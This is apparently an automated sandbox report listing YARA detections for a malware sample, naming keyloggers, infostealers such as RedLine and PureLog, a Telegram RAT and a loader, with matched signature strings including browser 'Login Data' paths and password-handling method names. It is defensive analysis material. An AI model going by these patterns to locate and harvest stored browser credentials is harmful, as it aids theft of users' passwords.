0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f76a:$a1: get_encryptedPassword 0x3f73e:$a2: get_encryptedUsername 0x3f802:$a3: get_timePasswordChanged 0x3f71a:$a4: get_passwordField 0x3f780:$a5: set_encryptedPassword 0x3f54d:$a7: get_logins 0x3ab9a:$a10: KeyLoggerEventArgs 0x3ab69:$a11: KeyLoggerEventArgsEventHandler 0x3f621:$a13: _encryptedPassword
0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a86e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49f11:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a16e:$a4: \Orbitum\User Data\Default\Login Data 0x4ab4d:$a5: \Kometa\User Data\Default\Login Data
0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d312:$s1: UnHook 0x3d2ae:$s2: SetHook 0x3d2e7:$s3: CallNextHook 0x3d276:$s4: _hook
00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
00000007.00000001.1805725850.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000C.00000001.1881316189.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000C.00000002.4134798302.000000001B5B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000007.00000002.4138636535.000000002A1F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000003.00000002.4136903739.0000000025421000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: jphwmyiA.pif PID: 340	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: jphwmyiA.pif PID: 340	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: jphwmyiA.pif PID: 340	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: jphwmyiA.pif PID: 340	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: jphwmyiA.pif PID: 340	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14b23a:$a1: get_encryptedPassword 0x19ae8a:$a1: get_encryptedPassword 0x1c005d:$a1: get_encryptedPassword 0x23fa2d:$a1: get_encryptedPassword 0x14b20e:$a2: get_encryptedUsername 0x19ae5e:$a2: get_encryptedUsername 0x1c0031:$a2: get_encryptedUsername 0x23fa01:$a2: get_encryptedUsername 0x14b2d2:$a3: get_timePasswordChanged 0x19af22:$a3: get_timePasswordChanged 0x1c00f5:$a3: get_timePasswordChanged 0x23fac5:$a3: get_timePasswordChanged 0x14b1ea:$a4: get_passwordField 0x19ae3a:$a4: get_passwordField 0x1c000d:$a4: get_passwordField 0x23f9dd:$a4: get_passwordField 0x14b250:$a5: set_encryptedPassword 0x19aea0:$a5: set_encryptedPassword 0x1c0073:$a5: set_encryptedPassword 0x23fa43:$a5: set_encryptedPassword 0x14b026:$a7: get_logins
Process Memory Space: jphwmyiA.pif PID: 6800	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: jphwmyiA.pif PID: 6800	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: jphwmyiA.pif PID: 6800	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: jphwmyiA.pif PID: 6800	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: jphwmyiA.pif PID: 6800	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14529b:$a1: get_encryptedPassword 0x167aa8:$a1: get_encryptedPassword 0x197748:$a1: get_encryptedPassword 0x1ac4ae:$a1: get_encryptedPassword 0x14526f:$a2: get_encryptedUsername 0x167a7c:$a2: get_encryptedUsername 0x19771c:$a2: get_encryptedUsername 0x1ac482:$a2: get_encryptedUsername 0x145333:$a3: get_timePasswordChanged 0x167b40:$a3: get_timePasswordChanged 0x1977e0:$a3: get_timePasswordChanged 0x1ac546:$a3: get_timePasswordChanged 0x14524b:$a4: get_passwordField 0x167a58:$a4: get_passwordField 0x1976f8:$a4: get_passwordField 0x1ac45e:$a4: get_passwordField 0x1452b1:$a5: set_encryptedPassword 0x167abe:$a5: set_encryptedPassword 0x19775e:$a5: set_encryptedPassword 0x1ac4c4:$a5: set_encryptedPassword 0x145087:$a7: get_logins
Process Memory Space: jphwmyiA.pif PID: 3808	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: jphwmyiA.pif PID: 3808	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: jphwmyiA.pif PID: 3808	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: jphwmyiA.pif PID: 3808	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: jphwmyiA.pif PID: 3808	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x60933:$a1: get_encryptedPassword 0x7156b:$a1: get_encryptedPassword 0xd8480:$a1: get_encryptedPassword 0xfcbc3:$a1: get_encryptedPassword 0x60907:$a2: get_encryptedUsername 0x7153f:$a2: get_encryptedUsername 0xd8454:$a2: get_encryptedUsername 0xfcb97:$a2: get_encryptedUsername 0x609cb:$a3: get_timePasswordChanged 0x71603:$a3: get_timePasswordChanged 0xd8518:$a3: get_timePasswordChanged 0xfcc5b:$a3: get_timePasswordChanged 0x608e3:$a4: get_passwordField 0x7151b:$a4: get_passwordField 0xd8430:$a4: get_passwordField 0xfcb73:$a4: get_passwordField 0x60949:$a5: set_encryptedPassword 0x71581:$a5: set_encryptedPassword 0xd8496:$a5: set_encryptedPassword 0xfcbd9:$a5: set_encryptedPassword 0x6071f:$a7: get_logins
Click to see the 113 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
7.2.jphwmyiA.pif.400000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
4.2.Aiymwhpj.PIF.213367a8.7.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1bcb0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x38cb0:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x39330:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1d98a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1d5d0:$s5: delete[] 0x1ca88:$s6: constructor or from DllMain.
3.2.jphwmyiA.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
7.2.jphwmyiA.pif.400000.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
12.2.jphwmyiA.pif.400000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
3.1.jphwmyiA.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
12.2.jphwmyiA.pif.1e190000.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.jphwmyiA.pif.1e190000.6.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
12.2.jphwmyiA.pif.1e190000.6.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
12.2.jphwmyiA.pif.1e190000.6.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.jphwmyiA.pif.1e190000.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.jphwmyiA.pif.1e190000.6.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
12.2.jphwmyiA.pif.1e190000.6.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
12.2.jphwmyiA.pif.1e190000.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
3.2.jphwmyiA.pif.25350ee8.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.jphwmyiA.pif.25350ee8.5.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
3.2.jphwmyiA.pif.25350ee8.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.jphwmyiA.pif.25350ee8.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.jphwmyiA.pif.25350ee8.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ca82:$a1: get_encryptedPassword 0x3ca56:$a2: get_encryptedUsername 0x3cb1a:$a3: get_timePasswordChanged 0x3ca32:$a4: get_passwordField 0x3ca98:$a5: set_encryptedPassword 0x3c865:$a7: get_logins 0x37eb2:$a10: KeyLoggerEventArgs 0x37e81:$a11: KeyLoggerEventArgsEventHandler 0x3c939:$a13: _encryptedPassword
3.2.jphwmyiA.pif.25350ee8.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47b86:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47229:$a3: \Google\Chrome\User Data\Default\Login Data 0x47486:$a4: \Orbitum\User Data\Default\Login Data 0x47e65:$a5: \Kometa\User Data\Default\Login Data
3.2.jphwmyiA.pif.25350ee8.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a62a:$s1: UnHook 0x3a5c6:$s2: SetHook 0x3a5ff:$s3: CallNextHook 0x3a58e:$s4: _hook
0.2.yxU3AgeVTi.exe.2930000.2.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
7.2.jphwmyiA.pif.29cc99de.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.jphwmyiA.pif.29cc99de.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.jphwmyiA.pif.29cc99de.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.jphwmyiA.pif.29cc99de.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.jphwmyiA.pif.29cc99de.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d96a:$a1: get_encryptedPassword 0x3d93e:$a2: get_encryptedUsername 0x3da02:$a3: get_timePasswordChanged 0x3d91a:$a4: get_passwordField 0x3d980:$a5: set_encryptedPassword 0x3d74d:$a7: get_logins 0x38d9a:$a10: KeyLoggerEventArgs 0x38d69:$a11: KeyLoggerEventArgsEventHandler 0x3d821:$a13: _encryptedPassword
7.2.jphwmyiA.pif.29cc99de.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48a6e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48111:$a3: \Google\Chrome\User Data\Default\Login Data 0x4836e:$a4: \Orbitum\User Data\Default\Login Data 0x48d4d:$a5: \Kometa\User Data\Default\Login Data
7.2.jphwmyiA.pif.29cc99de.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b512:$s1: UnHook 0x3b4ae:$s2: SetHook 0x3b4e7:$s3: CallNextHook 0x3b476:$s4: _hook
3.2.jphwmyiA.pif.250b99de.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.jphwmyiA.pif.250b99de.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
3.2.jphwmyiA.pif.250b99de.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.jphwmyiA.pif.250b99de.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.jphwmyiA.pif.250b99de.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d96a:$a1: get_encryptedPassword 0x3d93e:$a2: get_encryptedUsername 0x3da02:$a3: get_timePasswordChanged 0x3d91a:$a4: get_passwordField 0x3d980:$a5: set_encryptedPassword 0x3d74d:$a7: get_logins 0x38d9a:$a10: KeyLoggerEventArgs 0x38d69:$a11: KeyLoggerEventArgsEventHandler 0x3d821:$a13: _encryptedPassword
3.2.jphwmyiA.pif.250b99de.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48a6e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48111:$a3: \Google\Chrome\User Data\Default\Login Data 0x4836e:$a4: \Orbitum\User Data\Default\Login Data 0x48d4d:$a5: \Kometa\User Data\Default\Login Data
3.2.jphwmyiA.pif.250b99de.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b512:$s1: UnHook 0x3b4ae:$s2: SetHook 0x3b4e7:$s3: CallNextHook 0x3b476:$s4: _hook
0.2.yxU3AgeVTi.exe.215f2418.10.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x84c10:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x67be0:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x68260:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x868ea:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x86530:$s5: delete[] 0x1de88:$s6: constructor or from DllMain. 0x859e8:$s6: constructor or from DllMain.
12.2.jphwmyiA.pif.1d9f0000.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.jphwmyiA.pif.1d9f0000.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2.Aiymwhpj.PIF.213367a8.7.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x59ce0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x3ccb0:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x3d330:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x5b9ba:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x5b600:$s5: delete[] 0x1de88:$s6: constructor or from DllMain. 0x5aab8:$s6: constructor or from DllMain.
12.2.jphwmyiA.pif.1d9f0000.5.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
12.2.jphwmyiA.pif.1d9f0000.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.jphwmyiA.pif.1d9f0000.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.jphwmyiA.pif.1d9f0000.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f76a:$a1: get_encryptedPassword 0x3f73e:$a2: get_encryptedUsername 0x3f802:$a3: get_timePasswordChanged 0x3f71a:$a4: get_passwordField 0x3f780:$a5: set_encryptedPassword 0x3f54d:$a7: get_logins 0x3ab9a:$a10: KeyLoggerEventArgs 0x3ab69:$a11: KeyLoggerEventArgsEventHandler 0x3f621:$a13: _encryptedPassword
